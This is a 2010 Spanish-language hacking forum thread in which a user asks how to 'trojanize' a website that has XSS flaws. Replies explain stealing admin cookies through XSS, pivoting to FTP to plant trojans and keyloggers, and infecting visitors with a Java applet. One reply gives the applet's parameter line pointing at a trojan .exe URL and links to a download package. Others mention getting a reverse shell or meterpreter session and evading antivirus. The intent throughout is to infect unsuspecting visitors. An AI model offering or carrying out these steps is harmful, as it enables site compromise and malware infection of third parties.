|
Título: Ayuda! Troyanizar una web. Publicado por: laiox en 25 Junio 2010, 07:15 am hola, antes que nada, gracias por gastar su tiempo en leer mi post :D
bueno la cosa es asi, yo quiero troyanizar una web (Creo q esta bien el termino) q tiene Vulnerabilidades xss... ya se como encontrar si es vulnerable a xss etc etc pero no encuentro tutos sobre como troyanizar esta web. si pueden dejar link se los agradezco aaaaaaaa y si no es mucha molestia tmb quiero troyanizar una pagina mia para aprender un poco mas :) Desde ya muchisimas gracias Atte. Laiox Título: Re: Ayuda! Troyanizar una web. Publicado por: Debci en 25 Junio 2010, 09:21 am No no esta bien dicho, pues normalmente con un XSS pretendes robar datos comprometdores, si es un XSS persistente, por ejemplo en un DB SQL u otras, puedes conseguir robar la cookie a un admin, y si no es persistente, con un poco de ingenieria social tambien, una vez tienes privilegios en el sistema web, puedes dar saltos mas grandes como por ejemplo al servidor FTP y ahi ya subir tu troyano, keylogger y otros softwares dañinos (malware).
Saludos y se bueno Título: Re: Ayuda! Troyanizar una web. Publicado por: 177600531 en 25 Junio 2010, 11:30 am Infecta mediante un Applet de Java. Configura la url de index.html con la dirección de donde está alojado tú troyano.
Exactamente esta es la línea que tienes que cambiar: Código: <param name="url" value="http://www.adress.com/troyano.exe"> Aquí tienes la url para bajar el paquete: http:/www.proxicrack.srw.ro/java.rar (http://www.proxicrack.srw.ro/java.rar) Título: Re: Ayuda! Troyanizar una web. Publicado por: laiox en 26 Junio 2010, 02:10 am muchas gracias por responder, pero yo eh leido que se puede hacer que el troyano sea descargado y ejecutado automaticamente sin preguntale al usuario que ingresa, creo q es con un script, si alguien me ayudaria en eso le agradeceria :)
MUCHAS GRACIAS POR RESPONDERME CHICOS :) ESTA BUENO EL FORO :) FELICITACIONES A LOS ADMINS, MODERADORES, ETC :D Título: Re: Ayuda! Troyanizar una web. Publicado por: Debci en 27 Junio 2010, 11:25 am muchas gracias por responder, pero yo eh leido que se puede hacer que el troyano sea descargado y ejecutado automaticamente sin preguntale al usuario que ingresa, creo q es con un script, si alguien me ayudaria en eso le agradeceria :) Precisamente esas cosas son las que han corregido el 100% de los lenguajes de programación web, por eso el Java Applet infection es el mejor metodo, pues infectas sind escargar nada, al menos no visualmente, acepta un certificado, y obtienes una reverse shell, o una sesion de meterpreter.MUCHAS GRACIAS POR RESPONDERME CHICOS :) ESTA BUENO EL FORO :) FELICITACIONES A LOS ADMINS, MODERADORES, ETC :D Saludos Título: Re: Ayuda! Troyanizar una web. Publicado por: laiox en 27 Junio 2010, 18:09 pm Ah! Muchas gracias ya entendi
;-) ;-) ;-) ;-) ;-) ;-) ;-) ;-) ;-) ;-) ;-) ;-) ;-) ;-) ;-) ;-) ;-) ;-) ;-) ;-) ;-) ;-) ;-) ;-) jeje Laiox ! Título: Re: Ayuda! Troyanizar una web. Publicado por: tragantras en 28 Junio 2010, 09:38 am muchas gracias por responder, pero yo eh leido que se puede hacer que el troyano sea descargado y ejecutado automaticamente sin preguntale al usuario que ingresa, creo q es con un script, si alguien me ayudaria en eso le agradeceria :) Precisamente esas cosas son las que han corregido el 100% de los lenguajes de programación web, por eso el Java Applet infection es el mejor metodo, pues infectas sind escargar nada, al menos no visualmente, acepta un certificado, y obtienes una reverse shell, o una sesion de meterpreter.MUCHAS GRACIAS POR RESPONDERME CHICOS :) ESTA BUENO EL FORO :) FELICITACIONES A LOS ADMINS, MODERADORES, ETC :D Saludos Claaaaro bypassing A.V así en 1 segundico, el "shikata_ga_nai" ese tan famoso, que supuestamente salta todo, no se a vosotros, pero a mi nunca me ha pasado el AVG :/ |